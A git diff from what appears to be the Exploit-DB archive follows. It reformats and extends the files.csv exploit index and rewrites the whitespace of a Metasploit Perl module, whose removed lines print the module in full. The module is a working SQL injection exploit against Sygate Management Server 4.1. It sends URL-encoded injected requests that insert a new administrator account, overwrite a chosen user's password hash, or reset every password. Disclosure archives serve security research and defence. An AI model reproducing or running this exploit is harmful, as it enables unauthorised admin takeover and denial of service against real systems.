Execution",2001-09-01,"H D Moore",irix,remote,515 +10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 +10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0 -10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b CGI Overflow",2004-08-19,skape,cgi,webapps,0 +10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 @@ -9436,7 +9436,7 @@ id,file,description,date,author,platform,type,port 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 -10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 +10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 @@ -11180,7 +11180,7 @@ id,file,description,date,author,platform,type,port 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 -12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0 +12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0 @@ -12628,7 +12628,7 @@ id,file,description,date,author,platform,type,port 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 -14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0 +14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0 14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 @@ -13066,7 +13066,7 @@ id,file,description,date,author,platform,type,port 15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 -15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 +15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 @@ -13182,7 +13182,7 @@ id,file,description,date,author,platform,type,port 15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0 -15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 +15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0 15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0 @@ -14433,7 +14433,7 @@ id,file,description,date,author,platform,type,port 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0 -16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 +16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0 @@ -14535,7 +14535,7 @@ id,file,description,date,author,platform,type,port 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 -16755,platforms/windows/remote/16755.rb,"Novell iManager getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080 +16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080 16756,platforms/windows/remote/16756.rb,"Sambar 6 Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999 @@ -14687,7 +14687,7 @@ id,file,description,date,author,platform,type,port 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0 16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0 -16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing Command Injection",2011-01-08,metasploit,linux,remote,0 +16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0 16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0 @@ -14762,7 +14762,7 @@ id,file,description,date,author,platform,type,port 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0 -16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 +16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 @@ -14924,7 +14924,7 @@ id,file,description,date,author,platform,type,port 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0 -17177,platforms/windows/local/17177.rb,"MS Word Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0 +17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 @@ -15093,7 +15093,7 @@ id,file,description,date,author,platform,type,port 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0 -17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 +17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0 @@ -15165,7 +15165,7 @@ id,file,description,date,author,platform,type,port 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 -17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0 +17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0 @@ -15312,7 +15312,7 @@ id,file,description,date,author,platform,type,port 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 -17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 +17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0 @@ -16632,7 +16632,7 @@ id,file,description,date,author,platform,type,port 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0 19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0 19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0 -19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0 +19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0 @@ -21635,7 +21635,7 @@ id,file,description,date,author,platform,type,port 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0 -24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 +24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0 24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yal?n",windows,dos,0 @@ -29184,3 +29184,22 @@ id,file,description,date,author,platform,type,port 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0 32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0 32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0 +32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0 +32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0 +32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0 +32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0 +32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0 +32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0 +32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0 +32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0 +32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0 +32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0 +32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 'wholite.cgi' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0 +32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 +32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 +32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0 +32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0 +32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 +32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0 diff --git a/platforms/cgi/webapps/1680.pm b/platforms/cgi/webapps/1680.pm index 9c5095555..5557f3599 100755 --- a/platforms/cgi/webapps/1680.pm +++ b/platforms/cgi/webapps/1680.pm @@ -1,250 +1,249 @@ - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -## -# -# Affected product : Sygate Management Server v4.1 (at least) -# -# Vulnerability : SQL-Injection in login page -# Required privs : Network access to the admin interface (HTTP) -# Impact : Raw access to the database -# Sample payload : Create a valid admin account directly in the database -# -# Editor status : Official patch available -# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html -# -## - -package Msf::Exploit::sygate_policy_manager; -use base "Msf::Exploit"; -use strict; -use Pex::Text; -use bytes; -use vars qw{$HAS_SHA1}; - -BEGIN -{ - $HAS_SHA1 = 0; - - if (eval('require Digest::SHA1')) { - eval('use Digest::SHA1 qw(sha1);'); - $HAS_SHA1 = 1; - } -} - -my $advanced = { }; - -my $info = { - 'Name' => 'Sygate Management Server SQL Injection', - 'Version' => '$Revision: 1.3 $', - 'Authors' => [ 'Nicob ' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 0, - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 80], - 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], - 'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'], - 'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'], - 'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a non authenticated SQL-Injection vulnerability in the - Sygate Management Server (now Symantec Policy Manager), in order to create a new - admin account or change the password of an existing one. Version 4.1 is known to be vulnerable. - Version 5 is not vulnerable. -}), - - 'Refs' => - [ - ['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'], - ['CVE', '2006-0522'], - ['OSVDB', '22883'], - ['BID', '16452'], - ], - - 'Targets' => - [ - ['Change a specific users password', 'change_user_passwd'], - ['Create a new administrative account', 'add_account'], - ['Reset all passwords (denial of service)', 'reset_all'], - ], - - 'DefaultTarget' => 0, - - 'Keys' => ['sygate'], - - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Check { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $servlet = $self->GetVar('SERVLET'); - - my $request = - "GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return $self->CheckCode('Connect'); - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - - $s->Send($request); - my $results = $s->Recv(-1, 20); - $s->Close(); - - if ($results =~ /HTTP\/1\..\s+200/) { - - $self->PrintLine("[*] Vulnerable server detected!"); - return $self->CheckCode('Confirmed'); - - } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { - - $self->PrintLine("[*] The Sygate Policy Manager servlet was not found."); - return $self->CheckCode('Safe'); - } - - $self->PrintLine("[*] Generic error..."); - return $self->CheckCode('Generic'); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $vhost = $self->VHost; - my $target_port = $self->GetVar('RPORT'); - my $servlet = $self->GetVar('SERVLET'); - my $login = $self->GetVar('LOGIN'); - my $passwd = $self->GetVar('PASSWD'); - my $target = $self->Targets->[$self->GetVar('TARGET')]; - - if (! $HAS_SHA1) { - $self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit"); - return; - } - - # The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string - my $sha1 = sha1($login.$passwd); - $sha1 =~ s/./sprintf("%02x", ord($&))/ges; - $sha1 = "0x".uc($sha1); - - # Maximum level of privileges - my $privs = "255"; - - - my %sqlpayloads = - ( - # Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-( - 'add_account' => - "insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,". - "AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ". - "values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)", - - # Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only ! - 'reset_all' => - "update CMS35.Admin set Password=cast('AA' as varbinary)", - - # Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' ! - 'change_user_passwd' => - "update CMS35.Admin set Password=$sha1 where LoginName='$login'", - ); - - my $payload = $sqlpayloads{ $target->[1] }; - - # Inject our payload - $servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo"; - - my $request = - "GET $servlet HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $vhost:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ($s->IsError){ - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - $self->PrintLine("[*] Establishing a connection to the target..."); - $self->PrintLine(' '); - $s->Send($request); - my $results = $s->Recv(-1, 20); - - if ($results =~ /HTTP\/1\.. 200 OK/im) { - # Seems to be fine ;-) - $self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'"); - } else { - $self->PrintLine("Doh ! Are you sure this server is vulnerable ?"); - } - - $s->Close(); - return; -} - -sub URLEncode { - my $self = shift; - my $data = shift; - my $res; - - foreach my $c (unpack('C*', $data)) { - if ( - ($c >= 0x30 && $c <= 0x39) || - ($c >= 0x41 && $c <= 0x5A) || - ($c >= 0x61 && $c <= 0x7A) - ) { - $res .= chr($c); - } else { - $res .= sprintf("%%%.2x", $c); - } - } - return $res; -} - -sub VHost { - my $self = shift; - my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); - return $name; -} - -1; - -# milw0rm.com [2006-04-15] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +## +# +# Affected product : Sygate Management Server v4.1 (at least) +# +# Vulnerability : SQL-Injection in login page +# Required privs : Network access to the admin interface (HTTP) +# Impact : Raw access to the database +# Sample 